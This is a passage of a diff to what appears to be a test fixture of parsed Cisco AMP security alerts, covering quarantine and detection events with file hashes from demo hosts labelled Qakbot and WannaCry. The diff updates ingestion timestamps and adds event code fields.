Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6411525251028484000",
@@ -962,8 +973,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139838699Z",
+                "ingested": "2021-09-30T00:15:10.798677505Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6419264043361501000",
@@ -1037,8 +1049,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139840499Z",
+                "ingested": "2021-09-30T00:15:10.798679795Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6419264043361501000",
@@ -1112,8 +1125,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139842238Z",
+                "ingested": "2021-09-30T00:15:10.798682063Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6419264043361501000",
@@ -1187,8 +1201,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139843965Z",
+                "ingested": "2021-09-30T00:15:10.798684293Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "code": "553648155",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
                 "id": "6419264043361501000",
@@ -1264,8 +1279,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139845709Z",
+                "ingested": "2021-09-30T00:15:10.798686588Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419264043361501000",
@@ -1347,8 +1363,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139847573Z",
+                "ingested": "2021-09-30T00:15:10.798689021Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419264043361501000",
@@ -1426,8 +1443,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139849337Z",
+                "ingested": "2021-09-30T00:15:10.798691318Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419264043361501000",
@@ -1505,8 +1523,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139851089Z",
+                "ingested": "2021-09-30T00:15:10.798693584Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419264043361501000",
@@ -1578,8 +1597,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139852831Z",
+                "ingested": "2021-09-30T00:15:10.798695843Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6419264039066534000",
@@ -1653,8 +1673,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139854563Z",
+                "ingested": "2021-09-30T00:15:10.798698096Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "553648155",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
                 "id": "6419264039066534000",
@@ -1734,8 +1755,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139856307Z",
+                "ingested": "2021-09-30T00:15:10.798700344Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419264039066534000",
@@ -1817,8 +1839,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139858048Z",
+                "ingested": "2021-09-30T00:15:10.798702596Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419264039066534000",
@@ -1890,8 +1913,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139859886Z",
+                "ingested": "2021-09-30T00:15:10.798705016Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6412622782676337000",
@@ -1965,8 +1989,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139861680Z",
+                "ingested": "2021-09-30T00:15:10.798707293Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6412622782676337000",
@@ -2040,8 +2065,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139863424Z",
+                "ingested": "2021-09-30T00:15:10.798709557Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6412622782676337000",
@@ -2121,8 +2147,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139865171Z",
+                "ingested": "2021-09-30T00:15:10.798711839Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
